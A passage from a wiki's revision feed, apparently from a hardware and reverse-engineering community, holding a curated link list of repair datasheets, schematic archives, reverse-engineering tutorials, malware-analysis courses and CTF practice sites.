*[https://github.com/yacy/yacy_search_server YaCy] - is a free, open-source, peer-to-peer (P2P) search engine that operates without a central authority. It differs from traditional search engines by allowing users to create their own local or global indexes and share them with other users, creating a decentralized network.&lt;br /&gt;
&lt;br /&gt;
====Social Network / Fediverse (self-hosted &amp;amp; open-source)====&lt;br /&gt;
&lt;br /&gt;
*[https://joinmastodon.org/ Mastodon] - is a free and open-source software for running self-hosted social networking services. It has microblogging features similar to Twitter, which are offered by a large number of independently run nodes, known as instances or servers, each with its own code of conduct, terms of service, privacy policy, privacy options, and content moderation policies. [https://github.com/mastodon/mastodon Github repo].&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/pixelfed/pixelfed PixelFed] - is a decentralized, open-source social media platform focused on photo and video sharing, designed as an alternative to Instagram. It utilizes the ActivityPub protocol, allowing users to interact with accounts on other Pixelfed servers as if they were on the same platform.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/movim/movim Movim] - is a federated blogging and chat platform that acts as a web frontend for the XMPP protocol.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/emilebosch/awesome-fediverse Big fediverse list] - is a curated list of more decentralized social networks.&lt;br /&gt;
&lt;br /&gt;
==Education==&lt;br /&gt;
    &lt;br /&gt;
:[[:Literature|See the literature wiki page for all the resources.]]&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=Literature&amp;diff=3195</id>
		<title>Literature</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=Literature&amp;diff=3195"/>
		<updated>2025-08-05T16:48:07Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: add macdat.net&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Books, Journals, Magazines, Datasheets and all other literature related to reverse engineering is welcome here. The book pictured is the bound edition of a portion of the PDF's available in the PoC||GTFO section.[[File:POCorGTFO.jpg|thumb|&amp;lt;nowiki&amp;gt;Bound edition of PoC||GTFO, Proof of Concept OR Get The Fuck Out.&amp;lt;/nowiki&amp;gt;]]&lt;br /&gt;
&lt;br /&gt;
===Books and Magazines===&lt;br /&gt;
::[[PoCorGTFO|PoC||GTFO]] - International Journal of Proof-of-Concept or Get The Fuck Out (Mirror)&lt;br /&gt;
&lt;br /&gt;
::[https://wiki.recessim.com/w/images/0/01/HackingTheXbox_Free.pdf Hacking the Xbox] - An Introduction to Reverse Engineering by Andrew &amp;quot;bunnie&amp;quot; Huang&lt;br /&gt;
&lt;br /&gt;
::[https://nostarch.com/hardwarehackerpaperback The Hardware Hacker] - Manufacturing and Open Hardware by Andrew &amp;quot;bunnie&amp;quot; Huang&lt;br /&gt;
&lt;br /&gt;
::[https://www.lehmanns.de/shop/mathematik-informatik/56052761-9781789619133-practical-hardware-pentesting Practical Hardware Pentesting] - A guide to attacking embedded systems and protecting them against the most common hardware attacks (ISBN 978-1-78961-913-3).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks Awesome-Cybersecurity-Handbooks] - Big collection of documents for cybersecurity &amp;amp; reverse engineering.&lt;br /&gt;
&lt;br /&gt;
===Datasheets, boardviews, schematics, manuals===&lt;br /&gt;
&lt;br /&gt;
====Generic (various fields)====&lt;br /&gt;
&lt;br /&gt;
'''The curralated list below provides a wide range of useful websites offering resources regarding repair of wide range of electronic devices.'''&lt;br /&gt;
&lt;br /&gt;
::[https://www.eserviceinfo.com/ e-service info] - Here you can find free datasheets, service manuals, schema, schematic diagrams and software downloads, service menu and mode information, code calculators for many brands of equipment. Search in all service docs that are OCR'd.&lt;br /&gt;
&lt;br /&gt;
::[https://www.docin.com/ DOCin] - Chinese datasheet and other documents website&lt;br /&gt;
&lt;br /&gt;
::[https://www.espec.ws/ espec.ws] - Russian site for people specializing in the repair and development of electronic equipment or who want to learn how to do it. Has a archive with datasheets and schematics.&lt;br /&gt;
&lt;br /&gt;
::[https://www.badcaps.net/ Badcaps] - Badcaps Electronics Repair Forum &amp;amp; Schematic Search.&lt;br /&gt;
&lt;br /&gt;
::[https://www.eserviceinfo.com/browse.php eServiceInfo] - Service manuals, schematics, documentation, programs, electronics, hobby ....&lt;br /&gt;
&lt;br /&gt;
::[https://elektrotanya.com/keres Elektrotanya] - This site helps you to save the Earth from electronic waste! Schemetics, Service manuals, etc.&lt;br /&gt;
&lt;br /&gt;
::[https://servlib.com/ ServLib] - The largest library of service manuals and schematics for Sony, Panasonic, Sharp, JBL. Repair information for electronics technicians. [https://github.com/AriZoneVibes/ServLibScrapper/ Scraper for ServLib].&lt;br /&gt;
&lt;br /&gt;
::[https://www.freeservicemanuals.info FreeServiceManuals] - Free Service Manuals goal is to provide free schematics and (service) manuals for almost all brands of electronic devices.&lt;br /&gt;
&lt;br /&gt;
::[http://www.nostatech.nl/ Nostatech] - Nostatech's Free Service Manuals goal is to provide free schematics and (service) manuals for almost all brands of electronic devices.&lt;br /&gt;
&lt;br /&gt;
::[https://www.alldatasheet.com/ Alldatasheets] - Chinese datasheet database.&lt;br /&gt;
&lt;br /&gt;
::[https://alltransistors.com/ All Transistors] - All Transistors Datasheet. Cross Reference Search. Transistor Database.&lt;br /&gt;
&lt;br /&gt;
::[https://remont-aud.net/ Remont-aud] - Russian website offering a collection of schematics, datasheets and firmware dumps.&lt;br /&gt;
&lt;br /&gt;
::[http://rom.by/ rom.by] - Russian website has verious rom dumps, datasheet and schematics&lt;br /&gt;
&lt;br /&gt;
::[https://whycan.com whycan.com] - A Chinese embedded ARM development community offering a collection of schematics, SDKs for different platforms, datasheets, and firmware dumps.&lt;br /&gt;
&lt;br /&gt;
::[https://www.s-manuals.com/ S-manuals.com] - Schematics, Service Manuals, ..&lt;br /&gt;
&lt;br /&gt;
::[https://www.schematicsunlimited.com/ schematicsunlimited.com] - Download FREE diagrams, schematics, service manuals, operating manuals and other useful information for a variety of products.&lt;br /&gt;
&lt;br /&gt;
====Portable computers, smartphones, videocards, printers, TVs====&lt;br /&gt;
&lt;br /&gt;
'''The curralated list below provides a wide range of useful websites offering resources regarding repair of mostly smartphones, printers and laptops / notebooks.'''&lt;br /&gt;
&lt;br /&gt;
::[https://vlab.su/ Vlab.su] - Russian virtual repair community. Virtual repair laboratory. Any problem can be solved together.&lt;br /&gt;
&lt;br /&gt;
::[https://www.macdat.net/ macdat.net] - is a hobbyist-run website offering a detailed database of vintage laptop specs and Macintosh repair resources, including capacitor guides and service schematics.&lt;br /&gt;
&lt;br /&gt;
::[https://www.electronica-pt.com/ Electrónica PT] - Portuguese community for basic and advanced electronics, electronic repair support center.&lt;br /&gt;
&lt;br /&gt;
::[https://thetechstall.com/ The Tech Stall] - Download all the necessary tools for laptop and desktop motherboard diagnostics and fixes at no cost for free to reduce e-waste and spare the environment.&lt;br /&gt;
&lt;br /&gt;
::[https://www.cyberforum.ru/notebook-circuit/ Cyberforum] - A Russian forum for programmers and system administrators also offering some schematics and boardview for repair.&lt;br /&gt;
&lt;br /&gt;
::[https://zremcom.ru/scheme/scheme-laptops Zremcom] - A Russian website for repair, setup of servers, computers. Service manuals and diagrams for computers, laptops and power supplies.&lt;br /&gt;
&lt;br /&gt;
::[https://www.alisaler.com/ AliSaler] - Website offering EC &amp;amp; Bios firmwares / bins, datasheets, boardviews, schematics, ic equivalent information, and programmer software for laptops.&lt;br /&gt;
&lt;br /&gt;
::[https://www.alifixit.com/ AliFixit] - We believe in reviving technology and minimizing electronic waste. As our field is computers and laptops, we are here trying to provide as much stuff as possible for free to make our contribution.&lt;br /&gt;
&lt;br /&gt;
::[https://www.indiafix.in/p/schematic-and-boardview-collection.html IndiaFix] - Free laptop schematic &amp;amp; boardviews downloads. Desktop bios dumps, and free repair tips.&lt;br /&gt;
&lt;br /&gt;
::[https://www.apple-schematic.se/ Apple Schematic] - Free schematic and boardview (BRD) for Apple Macbooks and other Apple devices.&lt;br /&gt;
&lt;br /&gt;
::[https://novoselovvlad.ru/ Novoselovvlad.ru] - Blog of the workshop of Vladislav Novoselov (offers schematics, bios dumps, and various other helpful tools).&lt;br /&gt;
&lt;br /&gt;
::[http://printer1.blogspot.com/ printer1] - Collection of service manuals for printers and laptops.&lt;br /&gt;
&lt;br /&gt;
::[https://www.tvservice.org/ TV Service] - is a Russian website offering datasheets and schematics for TV repair.&lt;br /&gt;
&lt;br /&gt;
::[https://www.smarttvmanuals.net/ Smart Tv Manuals &amp;amp; Circuit Board Diagrams] - is a website offering datasheets and schematics for Smart TV repair.&lt;br /&gt;
&lt;br /&gt;
::[https://www.informaticanapoli.it/manuali-di-servizio/ informaticanapoli] - Italian website that offers service manuals and schematics for various laptop brands.&lt;br /&gt;
&lt;br /&gt;
::[https://www.gadget-manual.com/nvidia-geforce/ Gadget-Manual] - Graphic card manuals boardviews and datasheets.&lt;br /&gt;
&lt;br /&gt;
::[https://sector.biz.ua/docs/schematic_diagrams_msi_motherboards/schematic_diagrams_msi_motherboards.phtml Sector] - Russian website offering schemetic diagrams, datasheets and boardviews (Asrock, Asus, ECS, Gigabyte, Acer, IBM/Lenovo).&lt;br /&gt;
&lt;br /&gt;
::[https://schematic-x.blogspot.com/ Schematic-x] - Free laptops &amp;amp; desktop schematic diagrams and BIOS downloads.&lt;br /&gt;
&lt;br /&gt;
::[https://www.s-manuals.com/notebook S-manuals.com] - Notebooks, Schematics, Service Manuals, ..&lt;br /&gt;
&lt;br /&gt;
=====Laptop or smartphone Boardview / Schematic / Firmware [Groups]=====&lt;br /&gt;
::[https://t.me/schematicslaptop schematicslaptop] - Laptop schematics.&lt;br /&gt;
&lt;br /&gt;
::[https://t.me/biosarchive biosarchive] - The largest channel of archived bios (firmwares) of laptops.&lt;br /&gt;
&lt;br /&gt;
::[https://t.me/SMART_PHONE_SCHEMATICS SMART_PHONE_SCHEMATICS] - Colection of smartphone schematics.&lt;br /&gt;
&lt;br /&gt;
=====Software for opening Boardview files=====&lt;br /&gt;
&lt;br /&gt;
::[[Software_Tools#Tools_for_opening_CAD_or_Boardview_files|Tools for opening CAD or Boardview files.]]&lt;br /&gt;
&lt;br /&gt;
====Retro PC Hardware====&lt;br /&gt;
::[https://theretroweb.com/ The Retro Web] - The Retro Web motherboard database, here you can find board photos, BIOS images, manuals and more!&lt;br /&gt;
&lt;br /&gt;
::[https://soggi.org/ Soggi] - Retro hardware BIOS, firmware, drivers, manual, patches, tools, utilities, tech demos, other downloads and specifications available.&lt;br /&gt;
&lt;br /&gt;
====Vintage Audio Equipment Schematics / Manuals====&lt;br /&gt;
::[https://hifigoteborg.se/pdf/ HiFiGoteborg] - LoudAndProud HiFi Goteborg. Schematic archive of old forgotten Hi-Fi from the golden days.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
===SMD Marking Codes Database===&lt;br /&gt;
&lt;br /&gt;
'''Due to the small size of most SMD components, manufacturers are not able to write the full part number on the case. They use instead a marking code typically composed of a combination of 2 or 3 letters or digits.'''&amp;lt;br&amp;gt;&lt;br /&gt;
'''When repairing an unknown electronic board, it becomes so difficult to know what is the exact type of a given component. This database allows to quickly find the part number of a SMD component when you have only the marking code.'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
::[https://www.pcbcart.com/article/content/How-to-Identify-SMD-Components.html PCBCart] - How to Identify SMD Components Explained.&lt;br /&gt;
&lt;br /&gt;
::[https://smd.yooneed.one/ smd.yooneed.one] - A searchable database of electronics SMD components marking codes.&lt;br /&gt;
&lt;br /&gt;
::[https://embedeo.org/smd_codes/ embedeo.org/smd_codes] - SMD marking codes of electronic components such as bipolar transistors (BJT), field effect transistors (FET, MOSFET, JFET), diodes, Zener diodes, Schottky ..&lt;br /&gt;
&lt;br /&gt;
::[https://repaircompanion.com/ RepairCompanion] - Your companion for electronics tools, component identification, calculators, diagnostics and education.&lt;br /&gt;
&lt;br /&gt;
::[https://www.sos.sk/pdf/SMD_Catalog.pdf SOS electronic, The SMD CODEBOOK] - It lists well over 3,400 device codes in alphabetical order, together with type numbers, device characteristics or equivalents and pinout information.&lt;br /&gt;
&lt;br /&gt;
::[http://www.marsport.org.uk/smd/mainframe.htm The SMD Codebook (marsport)] - Online version to look up a SMD codes.&lt;br /&gt;
&lt;br /&gt;
::[https://www.s-manuals.com/smd S-manuals.com] - SMD Markings, SMD codes, ..&lt;br /&gt;
&lt;br /&gt;
===IC Equivlent Database===&lt;br /&gt;
&lt;br /&gt;
'''This might be useful if you run into a problem were you don't have a exact matching replacement part. Now you can use the cross reference search for an equivalent IC.'''&lt;br /&gt;
&lt;br /&gt;
::[https://alltransistors.com/ All Transistors] - Datasheet. Cross Reference Search. Transistor Database.&lt;br /&gt;
&lt;br /&gt;
::[https://octopart.com/ Octopart] - Lets you search for transistor datasheets but also allows you to filter by key specifications much like AllTransistors cross reference.&lt;br /&gt;
&lt;br /&gt;
===Hardware pinouts (web-based)===&lt;br /&gt;
&lt;br /&gt;
::[https://allpinouts.org/ allpinouts.org] - is a Web-based free content project to list cable and connectors pin-outs.&lt;br /&gt;
&lt;br /&gt;
::[https://pinouts.ru/ pinouts.ru] - Handbook of hardware schemes, cables and connectors layouts pinouts.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
===Find a image of the PCB without opening the device===&lt;br /&gt;
:# Modify the link below replace &amp;quot;example&amp;quot; without quotes with the product name and model you want to find&lt;br /&gt;
:# Visit the url and the results will show, if it does not show any results it has not been listed in the fccid database.&lt;br /&gt;
::&amp;lt;pre&amp;gt;https://www.google.com/search?tbm=isch&amp;amp;q=example+internal+site:fccid.io&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
::Note that there will be no results if the device does not have a wireless receiver or transmitter inside.&amp;lt;br&amp;gt; Some have used a off-the-shelf (OTS) wireless radio to avoid having to do a new FCC certification. In that case it is useless material and time saving to first quickly image search the ID to check for this.&lt;br /&gt;
::[https://fccid.io/search.php FCCID.io search direct link]&lt;br /&gt;
&lt;br /&gt;
====Electronic certification databases====&lt;br /&gt;
'''If the device is sold in the U.S. and complies with U.S. regulations, see below.'''&amp;lt;br&amp;gt;&lt;br /&gt;
An FCC ID is a unique identifier assigned to a device registered with the United States Federal Communications Commission.&amp;lt;br&amp;gt;&lt;br /&gt;
For legal sale of wireless devices in the US.&lt;br /&gt;
These databases can be of great use if you want to quickly know what kind of wireless communication hardware is used.&amp;lt;br&amp;gt;&lt;br /&gt;
Here you can most often find certifications, type approvals, specifications, instructions, internal/external pictures and sometimes even datasheets.&lt;br /&gt;
&lt;br /&gt;
::* FCC.Report. Provides this easily searchable FCC ID database.&lt;br /&gt;
:::: [https://fcc.report/FCC-ID/ -&amp;gt; FCC.Report]&lt;br /&gt;
::* Device.report. Electronics device database of over 500,000 products with certifications, type approvals, specifications, instructions, and datasheets. &lt;br /&gt;
:::: [https://device.report/ -&amp;gt; Device.Report]&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
===Digital Education===&lt;br /&gt;
:Resources for reverse engineering closed-source software to identify bugs, debug, and conduct penetration testing.&lt;br /&gt;
&lt;br /&gt;
====Reverse Engineering Guides====&lt;br /&gt;
:Tools are great, and sometimes free! Without knowing how to use them, they can be a big waste of time. Better to spend your time learning the basics, then apply your knowledge. &lt;br /&gt;
&lt;br /&gt;
::[http://security.cs.rpi.edu/courses/hwre-spring2014/ CSCI 4974 / 6974 Hardware Reverse Engineering] - Good slide decks on reverse engineering hardware at all levels, IC to PCB.&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/mytechnotalent/Reverse-Engineering-Tutorial Reverse Engineering Tutorial] - A comprehensive reverse engineering tutorial covering x86, x64, 32-bit ARM &amp;amp; 64-bit ARM architectures.&lt;br /&gt;
&lt;br /&gt;
=====Ghidra Documents=====&lt;br /&gt;
'''Class material linked from ghidra.re. Use &amp;lt;u&amp;gt;arrow keys on keyboard&amp;lt;/u&amp;gt; to move through slides.'''&lt;br /&gt;
======Beginner======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/Beginner/Introduction_to_Ghidra_Student_Guide.html Introduction to Ghidra Student Guide.]&lt;br /&gt;
======Intermediate======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/Intermediate/Intermediate_Ghidra_Student_Guide.html Intermediate to Ghidra Student Guide.]&lt;br /&gt;
======Advanced (PDF)======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/Advanced/improvingDisassemblyAndDecompilation.pdf Advanced (PDF).]&lt;br /&gt;
======Advanced Development======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/AdvancedDevelopment/GhidraAdvancedDevelopment.html Advanced Development.]&lt;br /&gt;
======Debugger======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/Debugger/README.html Debugger.]&lt;br /&gt;
======BSim======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/BSim/README.html BSim.]&lt;br /&gt;
&lt;br /&gt;
=====IDA Material=====&lt;br /&gt;
&lt;br /&gt;
::[[File:Reverse Engineering Malware IDA &amp;amp; Olly Basics 5 parts by otw v1.pdf|thumb]] - A Reverse Engineering Malware introduction and bare basics IDA &amp;amp; Olly x86 (5 parts) by otw.&lt;br /&gt;
&lt;br /&gt;
::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-1/ Using IDAPython to Make Your Life Easier: Part 1] - As a malware reverse engineer, I often find myself using IDA Pro in my day-to-day activities. It should come as no surprise, seeing as IDA Pro is the industry standard (although alternatives such as radare2 and Hopper are gaining traction). One of the more powerful features of IDA that I implore all reverse engineers to make use of is the Python addition, aptly named ‘IDAPython’, which exposes a large number of IDA API calls.&lt;br /&gt;
&lt;br /&gt;
:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-2/ Using IDAPython to Make Your Life Easier: Part 2]&lt;br /&gt;
&lt;br /&gt;
:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-3/ Using IDAPython to Make Your Life Easier: Part 3]&lt;br /&gt;
&lt;br /&gt;
:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-4/ Using IDAPython to Make Your Life Easier: Part 4]&lt;br /&gt;
&lt;br /&gt;
:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-5/ Using IDAPython to Make Your Life Easier: Part 5]&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering Some publicly available Malware analysis and Reverse engineering] - is a curated list of awesome materials from the user Dump-GUY a former Forensic, Malware Analyst, Reverse Engineer. [https://www.youtube.com/c/DuMpGuYTrIcKsTeR Youtube channel].&lt;br /&gt;
&lt;br /&gt;
=====x64dbg=====&lt;br /&gt;
&lt;br /&gt;
::[https://help.x64dbg.com/en/latest/introduction/index.html x64dbg] - Introduction &amp;amp; documentation page.&lt;br /&gt;
&lt;br /&gt;
=====Immunity Debugger=====&lt;br /&gt;
&lt;br /&gt;
::[https://class.malware.re/stuff/nardella/basic-reverse-engineering-immunity-debugger-36982.pdf Basic Reverse Engineering with Immunity Debugger] - SANS Institute Information Security Reading Room. Basic Reverse Engineering x86 with Immunity Debugger.&lt;br /&gt;
&lt;br /&gt;
=====Malware Reverse Engineering=====&lt;br /&gt;
&lt;br /&gt;
::[https://tryhackme.com/room/basicmalwarere BasicMalwareRE] - this room aims towards helping everyone learn about the basics of &amp;quot;Malware Reverse Engineering&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
::[https://gist.github.com/IdanBanani/5be0442ad390f89259b494098f450bfd Reversing / Malware Analysis / Assembly -resources] - is a large list of reversing materials and courses.&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/CyberSecurityUP/Awesome-Malware-and-Reverse-Engineering Malware and Reverse Engineering Complete Collection] - Awesome Malware and Reverse Engineering collection by Joas.&lt;br /&gt;
&lt;br /&gt;
=====Anti Debugging Protection Techniques with Examples=====&lt;br /&gt;
======x86 (Win32)======&lt;br /&gt;
&lt;br /&gt;
::[https://anti-debug.checkpoint.com/ cp&amp;lt;r&amp;gt; Anti-Debug Tricks] - By Check Point Research: CPR, x86 &amp;amp; x64.&lt;br /&gt;
&lt;br /&gt;
::[https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software Anti Debugging Protection Techniques with Examples] - A lot of great examples provided by apriorit on their blog, x86 &amp;amp; x64.&lt;br /&gt;
&lt;br /&gt;
::[https://www.codeproject.com/Articles/30815/An-Anti-Reverse-Engineering-Guide An-Anti-Reverse-Engineering-Guide] - By Joshua Tully hosted on CodeProject, Win32/x86 with examples.&lt;br /&gt;
&lt;br /&gt;
::[https://www.openrce.org/reference_library/anti_reversing OpenRCE Anti Reversing Database] - Mostly if not all Win32/x86. The Anti Reverse Engineering Database provides the analysis and desription for a number of various anti debugging, disassembly and dumping tricks. This resource aims to help reverse engineers locate, identify and bypass such techniques.&lt;br /&gt;
&lt;br /&gt;
::[[Media:The “Ultimate” Anti-Debugging.pdf]] - by Peter Ferrie (4 May 2011). This text contains a number of code snippets in both 32-bit and 64-bit versions.&lt;br /&gt;
&lt;br /&gt;
::[[Media:Anti-reverse engineering techniques by Jozef Miljak.pdf]] - An experimental study on which anti-reverse engineering technique are the most effective to protect your software from reversers, Win32/x86.&lt;br /&gt;
&lt;br /&gt;
::[https://forum.tuts4you.com/files/file/1218-anti-reverse-engineering-guide/ Anti-Reverse Engineering Guide By Teddy Rogers] - An individual reading this should have a solid understanding of ASM, how computers handle memory, the Win32 Debugging API, and at least some knowledge of Windows internals. &lt;br /&gt;
&lt;br /&gt;
======x64 (Win64)======&lt;br /&gt;
&lt;br /&gt;
::[https://anti-debug.checkpoint.com/ cp&amp;lt;r&amp;gt; Anti-Debug Tricks] - By Check Point Research: CPR, x86 &amp;amp; x64.&lt;br /&gt;
&lt;br /&gt;
::[https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software Anti Debugging Protection Techniques with Examples] - A lot of great examples provided by apriorit on their blog, x86 &amp;amp; x64.&lt;br /&gt;
&lt;br /&gt;
::[[Media:The “Ultimate” Anti-Debugging.pdf]] - by Peter Ferrie (4 May 2011). This text contains a number of code snippets in both 32-bit and 64-bit versions.&lt;br /&gt;
&lt;br /&gt;
====Machine code or virtual machine bytecode reference==== &lt;br /&gt;
&lt;br /&gt;
=====Assembly reference / manuals=====&lt;br /&gt;
&lt;br /&gt;
======x86======&lt;br /&gt;
&lt;br /&gt;
::[http://ref.x86asm.net/ Reference x86] - Reference X86 Opcode and Instructions (the holy x86 assembly bible).&lt;br /&gt;
&lt;br /&gt;
======x86 Training======&lt;br /&gt;
::[https://x86re.com/1.html Reverse Engineering for Noobs Part 1] - Brief introduction to RE, executables, compiling, 32-bit x86 syntax, and stack frames.&lt;br /&gt;
&lt;br /&gt;
::[https://x86re.com/2.html Reverse Engineering for Noobs Part 2: Portable Executable Files] - Breakdown of Portable Executable image file headers and sections.&lt;br /&gt;
&lt;br /&gt;
======x86 and amd64======&lt;br /&gt;
&lt;br /&gt;
::[https://www.felixcloutier.com/x86/ x86 and amd64 instruction reference] - Derived from the December 2023 version of the Intel® 64 and IA-32 Architectures Software Developer's Manual.&lt;br /&gt;
&lt;br /&gt;
=====Bytecode reference=====&lt;br /&gt;
======Java Virtual Machine (JVM)======&lt;br /&gt;
&lt;br /&gt;
::[https://en.wikipedia.org/wiki/List_of_Java_bytecode_instructions Wikipedia] - List of Java bytecode instructions.&lt;br /&gt;
&lt;br /&gt;
::[https://javaalmanac.io/bytecode/ The Java Version Almanac] - Java Bytecode, by Mnemonic.&lt;br /&gt;
&lt;br /&gt;
======Dalvik opcodes (Android)======&lt;br /&gt;
&lt;br /&gt;
::[http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html Pallergabor] - Dalvik opcodes documentation with examples.&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/user1342/Awesome-Android-Reverse-Engineering Awesome-Android-Reverse-Engineering] - A curated list of awesome Android Reverse Engineering training, resources, and tools.&lt;br /&gt;
&lt;br /&gt;
======Common Language Runtime (CLR) .NET======&lt;br /&gt;
&lt;br /&gt;
::[https://en.wikipedia.org/wiki/List_of_CIL_instructions Wikipedia] - List of CIL instructions.&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/stakx/ecma-335/blob/master/docs/TABLE_OF_CONTENTS.md ECMA-335 Documentation] - This Standard defines the Common Language Infrastructure (CLI).&lt;br /&gt;
&lt;br /&gt;
====Reverse Engineering Challenges====&lt;br /&gt;
&lt;br /&gt;
::[https://crackmes.one/ Crackmes.one] - is a simple place where you can download crackmes to improve your reverse engineering skills.&lt;br /&gt;
&lt;br /&gt;
::[https://crackmy.app/ CrackMy.App] - is as place to share your crackmes, solve challenges, and climb the leaderboard in the ultimate reverse engineering community.&lt;br /&gt;
&lt;br /&gt;
====Security Training Classes====&lt;br /&gt;
&lt;br /&gt;
::[https://ost2.fyi/ OpenSecurityTraining2] - is a free, beta-stage online platform built on Open edX that offers in-depth cybersecurity and reverse-engineering courses like x86 assembly, kernel exploitation, and firmware analysis.&lt;br /&gt;
&lt;br /&gt;
====Security CTF====&lt;br /&gt;
Capture the Flag (CTF) in computer security is an exercise in which participants attempt to find text strings, called &amp;quot;flags&amp;quot;, which are secretly hidden in purposefully vulnerable programs or websites.&amp;lt;br&amp;gt;&lt;br /&gt;
Learn more about reverse engineering and cybersecurity start playing CTF's.&lt;br /&gt;
&lt;br /&gt;
::[https://jaimelightfoot.com/blog/so-you-want-to-ctf-a-beginners-guide/ CTF Beginners Guide] - is intended to be a guide for beginners who have just started playing CTFs (or for people who have never played, but would like to).&lt;br /&gt;
&lt;br /&gt;
::[https://ctflearn.com/ CTFlearn] - The most beginner-friendly way to get into hacking. Challenges Test your skills by hacking your way through hundreds of challenges.&lt;br /&gt;
&lt;br /&gt;
::[https://ctf101.org/ CTF101] - a site documenting the basics of playing Capture the Flags. This guide was written and maintained by the OSIRIS Lab at New York University.&lt;br /&gt;
&lt;br /&gt;
::[https://picoctf.org/ picoCTF] - is a free computer security education program with original content built on a capture-the-flag framework created by security and privacy experts.&lt;br /&gt;
&lt;br /&gt;
::[https://microcorruption.com/ MicroCorruption] - is a online, embedded debugger that starts from scratch and introduces the very foundations of memory corruption. Great practice for learning the basics of binary exploitation.&lt;br /&gt;
&lt;br /&gt;
::[https://echoctf.red/ echoctf.red] - A platform to develop, run and administer CTF competitions. The online echoCTF.RED platform user interfaces and codebase.&lt;br /&gt;
&lt;br /&gt;
::[https://pwnable.kr/ Wargames Pwnable.kr] - is a non-commercial wargame site which provides various pwn challenges regarding system exploitation, including reverse engineering, web exploitation, and cryptography.&lt;br /&gt;
&lt;br /&gt;
::[https://pwnable.tw/challenge/ Wargames Pwnable.tw] - is a wargame site for hackers to test and expand their binary exploiting skills. HOW-TO. Try to find out the vulnerabilities exists.&lt;br /&gt;
&lt;br /&gt;
::[https://ctfsites.github.io/ More CTF sites] - A curated list of more CTF sites on Github.&lt;br /&gt;
&lt;br /&gt;
====Embedded security Challenge (ESC)====&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2024 csaw_esc_2024] - CSAW 2024 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2023 csaw_esc_2023] - CSAW 2023 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2022 csaw_esc_2022] - CSAW 2022 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2021 csaw_esc_2021] - CSAW 2021 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2019 csaw_esc_2019] - CSAW 2019 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
====800 MHz AMPS Documentation====&lt;br /&gt;
::[https://wiki.recessim.com/w/images/8/86/Cellular_Telephone_Bible_With_SIDs.txt The Cellular Telephone Bible by Mike Larsen (1997)] Unlock codes and programming procedures of early 800 MHz analog AMPS cellular phones. This document also contains the system IDs (SID) of the 800 MHz analog service providers.&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=Literature&amp;diff=3194</id>
		<title>Literature</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=Literature&amp;diff=3194"/>
		<updated>2025-08-05T16:25:38Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: add schematicsunlimited.com&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Books, Journals, Magazines, Datasheets and all other literature related to reverse engineering is welcome here. The book pictured is the bound edition of a portion of the PDF's available in the PoC||GTFO section.[[File:POCorGTFO.jpg|thumb|&amp;lt;nowiki&amp;gt;Bound edition of PoC||GTFO, Proof of Concept OR Get The Fuck Out.&amp;lt;/nowiki&amp;gt;]]&lt;br /&gt;
&lt;br /&gt;
===Books and Magazines===&lt;br /&gt;
::[[PoCorGTFO|PoC||GTFO]] - International Journal of Proof-of-Concept or Get The Fuck Out (Mirror)&lt;br /&gt;
&lt;br /&gt;
::[https://wiki.recessim.com/w/images/0/01/HackingTheXbox_Free.pdf Hacking the Xbox] - An Introduction to Reverse Engineering by Andrew &amp;quot;bunnie&amp;quot; Huang&lt;br /&gt;
&lt;br /&gt;
